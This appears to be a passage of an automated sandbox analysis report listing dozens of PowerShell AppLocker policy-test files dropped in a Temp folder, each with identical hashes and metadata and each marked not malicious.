                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0vqkywwt.cqa.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1abnfqa0.w3m.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1yy1vipq.0md.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25hobolp.ue0.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25xk0kfm.sr4.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2mechq1e.gx4.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_45cxzipa.jdr.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4alssgef.w1e.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4bhnd4d1.ttt.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qghsjwq.pyf.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5w2prtoo.szn.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bpv5st3r.yee.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_byi5h0pu.hdi.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bz4xflg2.avt.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3xjtosl.51c.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cj3zvi35.x5g.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cyjyqhdi.ygv.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d4r3pqup.kyt.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e0ktfxhk.o2a.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_efbvuzaf.5ao.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eq4lbb14.sih.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etd50kt0.uhd.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0e0nppp.e13.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f1coew1m.1lz.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fpamkv4q.q50.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_frcryvvc.ozx.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ghkhjurt.lo0.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0jtyck2.s3g.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h2jjiad0.txo.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hymk0gmt.af0.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iy4zsdkz.lz4.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
